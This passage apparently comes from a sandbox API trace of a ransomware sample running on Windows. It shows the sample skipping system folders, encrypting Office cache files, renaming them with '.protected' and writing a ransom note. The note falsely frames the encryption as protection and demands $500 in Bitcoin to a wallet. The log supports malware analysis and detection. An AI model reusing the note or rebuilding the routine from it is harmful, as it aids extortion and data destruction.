lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0057.354] CloseHandle (hObject=0xb4) returned 1 [0057.354] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml.protected") returned 92 [0057.354] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml.protected" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.xml.protected")) returned 1 [0057.354] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0057.354] lstrcmpiW (lpString1="Setup.xml", lpString2="Windows") returned -1 [0057.354] lstrcmpiW (lpString1="Setup.xml", lpString2="Program Files") returned 1 [0057.354] lstrcmpiW (lpString1="Setup.xml", lpString2="Program Files (x86)") returned 1 [0057.354] lstrcmpiW (lpString1="Setup.xml", lpString2="$Recycle.bin") returned 1 [0057.354] lstrcmpiW (lpString1="Setup.xml", lpString2="System Volume Information") returned -1 [0057.354] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0057.354] StrStrIW (lpFirst="Setup.xml", lpSrch=".protected") returned 0x0 [0057.355] lstrcmpW (lpString1="Setup.xml", lpString2="RESTORE_FILES.txt") returned 1 [0057.355] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0057.355] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, 
dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0057.355] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0057.355] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0057.355] StrStrW (lpFirst="Setup.xml", lpSrch=".txt") returned 0x0 [0057.355] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0057.355] StrStrW (lpFirst="Setup.xml", lpSrch=".rar") returned 0x0 [0057.355] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0057.355] StrStrW (lpFirst="Setup.xml", lpSrch=".zip") returned 0x0 [0057.355] ReadFile (in: hFile=0xb4, lpBuffer=0x495c48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesRead=0x295f174*=0x73c, lpOverlapped=0x0) returned 1 [0057.459] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffff8c4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0057.459] WriteFile (in: hFile=0xb4, lpBuffer=0x495c48*, nNumberOfBytesToWrite=0x73c, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesWritten=0x295f174*=0x73c, lpOverlapped=0x0) returned 1 [0057.459] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0057.459] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, 
lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0057.459] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0057.459] CloseHandle (hObject=0xb4) returned 1 [0057.460] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml.protected") returned 86 [0057.460] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml.protected" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\setup.xml.protected")) returned 1 [0057.460] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0057.460] FindClose (in: hFindFile=0x447cc0 | out: hFindFile=0x447cc0) returned 1 [0057.460] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\RESTORE_FILES.txt") returned 84 [0057.460] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\RESTORE_FILES.txt" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0057.461] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0057.461] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0057.462] lstrlenA (lpString="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") returned 684 [0057.462] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0057.462] 
lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0057.462] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, lpOverlapped=0x0) returned 1 [0057.462] CloseHandle (hObject=0xa4) returned 1 [0057.462] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0057.462] lstrcmpiW (lpString1="{90140000-0054-0409-1000-0000000FF1CE}-C", lpString2="Windows") returned -1 [0057.462] lstrcmpiW (lpString1="{90140000-0054-0409-1000-0000000FF1CE}-C", lpString2="Program Files") returned -1 [0057.462] lstrcmpiW (lpString1="{90140000-0054-0409-1000-0000000FF1CE}-C", lpString2="Program Files (x86)") returned -1 [0057.462] lstrcmpiW (lpString1="{90140000-0054-0409-1000-0000000FF1CE}-C", lpString2="$Recycle.bin") returned 1 [0057.462] lstrcmpiW (lpString1="{90140000-0054-0409-1000-0000000FF1CE}-C", lpString2="System Volume Information") returned -1 [0057.462] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C") returned 66 [0057.462] lstrcmpW (lpString1="{90140000-0054-0409-1000-0000000FF1CE}-C", lpString2=".") returned 1 [0057.462] lstrcmpW (lpString1="{90140000-0054-0409-1000-0000000FF1CE}-C", lpString2="..") returned 1 [0057.462] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\*") returned 68 [0057.462] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x447cc0 [0057.462] lstrcmpiW 
(lpString1=".", lpString2="Windows") returned -1 [0057.462] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0057.463] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0057.463] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0057.463] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0057.463] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\.") returned 68 [0057.463] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0057.463] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0057.463] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0057.463] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0057.494] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0057.495] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\." 
(normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0057.495] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0057.495] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0057.495] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0057.495] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0057.495] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0057.495] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0057.495] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\..") returned 69 [0057.495] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0057.495] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0057.495] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0057.495] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0057.495] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0057.495] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0057.495] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\.." 
(normalized: "c:\\msocache\\all users"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0057.495] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0057.495] lstrcmpiW (lpString1="Setup.xml", lpString2="Windows") returned -1 [0057.495] lstrcmpiW (lpString1="Setup.xml", lpString2="Program Files") returned 1 [0057.495] lstrcmpiW (lpString1="Setup.xml", lpString2="Program Files (x86)") returned 1 [0057.495] lstrcmpiW (lpString1="Setup.xml", lpString2="$Recycle.bin") returned 1 [0057.496] lstrcmpiW (lpString1="Setup.xml", lpString2="System Volume Information") returned -1 [0057.496] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0057.496] StrStrIW (lpFirst="Setup.xml", lpSrch=".protected") returned 0x0 [0057.496] lstrcmpW (lpString1="Setup.xml", lpString2="RESTORE_FILES.txt") returned 1 [0057.496] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0057.496] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0057.496] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0057.497] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0057.497] StrStrW (lpFirst="Setup.xml", lpSrch=".txt") returned 0x0 
[0057.497] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0057.497] StrStrW (lpFirst="Setup.xml", lpSrch=".rar") returned 0x0 [0057.497] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0057.497] StrStrW (lpFirst="Setup.xml", lpSrch=".zip") returned 0x0 [0057.497] ReadFile (in: hFile=0xb4, lpBuffer=0x495c48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesRead=0x295f174*=0x1861, lpOverlapped=0x0) returned 1 [0057.512] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffe79f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0057.512] WriteFile (in: hFile=0xb4, lpBuffer=0x495c48*, nNumberOfBytesToWrite=0x1861, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesWritten=0x295f174*=0x1861, lpOverlapped=0x0) returned 1 [0057.512] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0057.512] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0057.512] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0057.512] CloseHandle (hObject=0xb4) returned 1 [0057.512] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml.protected") returned 86 [0057.512] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All 
Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml.protected" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\setup.xml.protected")) returned 1 [0057.541] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0057.541] lstrcmpiW (lpString1="VisioLR.cab", lpString2="Windows") returned -1 [0057.542] lstrcmpiW (lpString1="VisioLR.cab", lpString2="Program Files") returned 1 [0057.542] lstrcmpiW (lpString1="VisioLR.cab", lpString2="Program Files (x86)") returned 1 [0057.542] lstrcmpiW (lpString1="VisioLR.cab", lpString2="$Recycle.bin") returned 1 [0057.542] lstrcmpiW (lpString1="VisioLR.cab", lpString2="System Volume Information") returned 1 [0057.543] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab") returned 78 [0057.543] StrStrIW (lpFirst="VisioLR.cab", lpSrch=".protected") returned 0x0 [0057.543] lstrcmpW (lpString1="VisioLR.cab", lpString2="RESTORE_FILES.txt") returned 1 [0057.543] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0057.543] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0057.543] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiolr.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0057.543] 
lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab") returned 78 [0057.543] StrStrW (lpFirst="VisioLR.cab", lpSrch=".txt") returned 0x0 [0057.543] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab") returned 78 [0057.543] StrStrW (lpFirst="VisioLR.cab", lpSrch=".rar") returned 0x0 [0057.543] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab") returned 78 [0057.543] StrStrW (lpFirst="VisioLR.cab", lpSrch=".zip") returned 0x0 [0057.543] ReadFile (in: hFile=0xb4, lpBuffer=0x495c48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0057.551] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0057.551] WriteFile (in: hFile=0xb4, lpBuffer=0x495c48*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0057.555] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0057.555] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0057.666] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0057.666] CloseHandle (hObject=0xb4) returned 1 [0057.667] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s%s" | out: 
pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab.protected") returned 88 [0057.667] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiolr.cab"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab.protected" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiolr.cab.protected")) returned 1 [0057.684] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0057.684] lstrcmpiW (lpString1="VisioMUI.msi", lpString2="Windows") returned -1 [0057.684] lstrcmpiW (lpString1="VisioMUI.msi", lpString2="Program Files") returned 1 [0057.684] lstrcmpiW (lpString1="VisioMUI.msi", lpString2="Program Files (x86)") returned 1 [0057.684] lstrcmpiW (lpString1="VisioMUI.msi", lpString2="$Recycle.bin") returned 1 [0057.684] lstrcmpiW (lpString1="VisioMUI.msi", lpString2="System Volume Information") returned 1 [0057.684] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi") returned 79 [0057.684] StrStrIW (lpFirst="VisioMUI.msi", lpSrch=".protected") returned 0x0 [0057.684] lstrcmpW (lpString1="VisioMUI.msi", lpString2="RESTORE_FILES.txt") returned 1 [0057.684] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0057.684] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0057.685] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi" (normalized: "c:\\msocache\\all 
users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0057.685] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi") returned 79 [0057.685] StrStrW (lpFirst="VisioMUI.msi", lpSrch=".txt") returned 0x0 [0057.685] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi") returned 79 [0057.685] StrStrW (lpFirst="VisioMUI.msi", lpSrch=".rar") returned 0x0 [0057.685] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi") returned 79 [0057.685] StrStrW (lpFirst="VisioMUI.msi", lpSrch=".zip") returned 0x0 [0057.685] ReadFile (in: hFile=0xb4, lpBuffer=0x495c48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0057.973] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0057.973] WriteFile (in: hFile=0xb4, lpBuffer=0x495c48*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0057.973] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0057.973] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0057.977] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: 
lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0057.977] CloseHandle (hObject=0xb4) returned 1 [0057.978] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi.protected") returned 89 [0057.978] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.msi"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi.protected" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.msi.protected")) returned 1 [0057.978] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0057.978] lstrcmpiW (lpString1="VisioMUI.xml", lpString2="Windows") returned -1 [0057.978] lstrcmpiW (lpString1="VisioMUI.xml", 